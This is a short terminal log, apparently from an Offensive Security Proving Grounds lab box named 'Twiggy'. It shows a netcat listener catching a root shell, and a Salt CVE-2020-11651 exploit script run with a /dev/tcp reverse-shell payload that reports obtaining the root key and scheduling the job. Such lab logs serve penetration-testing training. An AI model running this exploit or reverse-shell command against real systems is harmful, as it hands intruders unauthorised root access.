┌──(pikey㉿kali)-[~]
└─$ sudo nc -lvnp 22
[sudo] password for pikey:
listening on [any] 22 ...
connect to [192.168.45.188] from (UNKNOWN) [192.168.219.62] 52424
sh: no job control in this shell
sh-4.2# whoami
whoami
root

┌──(pikey㉿kali)-[~/Offsec/PG/Twiggy]
└─$ python3 48421.py --master 192.168.219.62 --exec "sh -i >& /dev/tcp/192.168.45.188/22 0>&1"
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/pikey/.local/lib/python3.11/site-packages/salt/transport/client.py:27: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
warn_until(
[+] Checking salt-master (192.168.219.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: 3J+XIUkNF7hBV4vmBMThrOVNtk/MMCHmT7QoUZ9lmQL9u4EJafv/kEAnCeEpdZRrgO7g2dEL2Ho=
[+] Attemping to execute sh -i >& /dev/tcp/192.168.45.188/22 0>&1 on 192.168.219.62
[+] Successfully scheduled job: 20231111185139337282